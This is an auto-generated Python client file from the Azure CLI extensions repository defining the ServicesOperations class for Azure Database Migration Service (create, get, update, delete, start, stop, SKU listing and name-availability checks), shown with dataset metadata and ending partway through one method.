| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7301afa3e7cacd4dea839989edb6b73691c60742
| 49,098
|
py
|
Python
|
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
src/dms_ext/azext_dms/vendored_sdks/datamigration/operations/services_operations.py
|
dwj300/azure-cli-extensions
|
9b929cacba1ce66bbc2e57c93de0d710cd97c567
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class ServicesOperations(object):
"""ServicesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API. Constant value: "2018-07-15-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2018-07-15-preview"
self.config = config
def _create_or_update_initial(
self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DataMigrationService')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataMigrationService', response)
if response.status_code == 201:
deserialized = self._deserialize('DataMigrationService', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Create or update DMS Instance.
The services resource is the top-level resource that represents the
Database Migration Service. The PUT method creates a new service or
updates an existing one. When a service is updated, existing child
resources (i.e. tasks) are unaffected. Services currently support a
single kind, "vm", which refers to a VM-based service, although other
kinds may be added in the future. This method can change the kind, SKU,
and network of the service, but if tasks are currently running (i.e.
the service is busy), this will fail with 400 Bad Request
("ServiceIsBusy"). The provider will reply when successful with 200 OK
or 201 Created. Long-running operations use the provisioningState
property.
:param parameters: Information about the service
:type parameters:
~azure.mgmt.datamigration.models.DataMigrationService
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
DataMigrationService or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datamigration.models.DataMigrationService]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
raw_result = self._create_or_update_initial(
parameters=parameters,
group_name=group_name,
service_name=service_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201, 202]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = self._deserialize('DataMigrationService', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def get(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Get DMS Service Instance.
The services resource is the top-level resource that represents the
Database Migration Service. The GET method retrieves information about
a service instance.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataMigrationService or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datamigration.models.DataMigrationService or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataMigrationService', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def _delete_initial(
self, group_name, service_name, delete_running_tasks=None, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if delete_running_tasks is not None:
query_parameters['deleteRunningTasks'] = self._serialize.query("delete_running_tasks", delete_running_tasks, 'bool')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, group_name, service_name, delete_running_tasks=None, custom_headers=None, raw=False, **operation_config):
"""Delete DMS Service Instance.
The services resource is the top-level resource that represents the
Database Migration Service. The DELETE method deletes a service. Any
running tasks will be canceled.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param delete_running_tasks: Delete the resource even if it contains
running tasks
:type delete_running_tasks: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
raw_result = self._delete_initial(
group_name=group_name,
service_name=service_name,
delete_running_tasks=delete_running_tasks,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202, 204]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def _update_initial(
self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DataMigrationService')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataMigrationService', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, parameters, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Create or update DMS Service Instance.
The services resource is the top-level resource that represents the
Database Migration Service. The PATCH method updates an existing
service. This method can change the kind, SKU, and network of the
service, but if tasks are currently running (i.e. the service is busy),
this will fail with 400 Bad Request ("ServiceIsBusy").
:param parameters: Information about the service
:type parameters:
~azure.mgmt.datamigration.models.DataMigrationService
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns
DataMigrationService or ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.datamigration.models.DataMigrationService]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
raw_result = self._update_initial(
parameters=parameters,
group_name=group_name,
service_name=service_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = self._deserialize('DataMigrationService', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'}
def check_status(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Check service health status.
The services resource is the top-level resource that represents the
Database Migration Service. This action performs a health check and
returns the status of the service and virtual machine size.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DataMigrationServiceStatusResponse or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.datamigration.models.DataMigrationServiceStatusResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
# Construct URL
url = self.check_status.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataMigrationServiceStatusResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_status.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkStatus'}
def _start_initial(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.start.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def start(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Start service.
The services resource is the top-level resource that represents the
Database Migration Service. This action starts the service and the
service can be used for data migration.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
raw_result = self._start_initial(
group_name=group_name,
service_name=service_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/start'}
def _stop_initial(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.stop.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def stop(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Stop service.
The services resource is the top-level resource that represents the
Database Migration Service. This action stops the service and the
service cannot be used for data migration. The service owner won't be
billed when the service is stopped.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
raw_result = self._stop_initial(
group_name=group_name,
service_name=service_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
raise models.ApiErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/stop'}
def list_skus(
self, group_name, service_name, custom_headers=None, raw=False, **operation_config):
"""Get compatible SKUs.
The services resource is the top-level resource that represents the
Database Migration Service. The skus action returns the list of SKUs
that a service resource can be updated to.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of AvailableServiceSku
:rtype:
~azure.mgmt.datamigration.models.AvailableServiceSkuPaged[~azure.mgmt.datamigration.models.AvailableServiceSku]
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_skus.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.AvailableServiceSkuPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.AvailableServiceSkuPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_skus.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/skus'}
def check_children_name_availability(
self, group_name, service_name, name=None, type=None, custom_headers=None, raw=False, **operation_config):
"""Check nested resource name validity and availability.
This method checks whether a proposed nested resource name is valid and
available.
:param group_name: Name of the resource group
:type group_name: str
:param service_name: Name of the service
:type service_name: str
:param name: The proposed resource name
:type name: str
:param type: The resource type chain (e.g. virtualMachines/extensions)
:type type: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NameAvailabilityResponse or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datamigration.models.NameAvailabilityResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
parameters = models.NameAvailabilityRequest(name=name, type=type)
# Construct URL
url = self.check_children_name_availability.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'NameAvailabilityRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('NameAvailabilityResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_children_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkNameAvailability'}
def list_by_resource_group(
self, group_name, custom_headers=None, raw=False, **operation_config):
"""Get services in resource group.
The Services resource is the top-level resource that represents the
Database Migration Service. This method returns a list of service
resources in a resource group.
:param group_name: Name of the resource group
:type group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DataMigrationService
:rtype:
~azure.mgmt.datamigration.models.DataMigrationServicePaged[~azure.mgmt.datamigration.models.DataMigrationService]
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'groupName': self._serialize.url("group_name", group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services'}
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Get services in subscription.
The services resource is the top-level resource that represents the
Database Migration Service. This method returns a list of service
resources in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DataMigrationService
:rtype:
~azure.mgmt.datamigration.models.DataMigrationServicePaged[~azure.mgmt.datamigration.models.DataMigrationService]
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ApiErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.DataMigrationServicePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/services'}
def check_name_availability(
self, location, name=None, type=None, custom_headers=None, raw=False, **operation_config):
"""Check name validity and availability.
This method checks whether a proposed top-level resource name is valid
and available.
:param location: The Azure region of the operation
:type location: str
:param name: The proposed resource name
:type name: str
:param type: The resource type chain (e.g. virtualMachines/extensions)
:type type: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: NameAvailabilityResponse or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.datamigration.models.NameAvailabilityResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ApiErrorException<azure.mgmt.datamigration.models.ApiErrorException>`
"""
parameters = models.NameAvailabilityRequest(name=name, type=type)
# Construct URL
url = self.check_name_availability.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'location': self._serialize.url("location", location, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
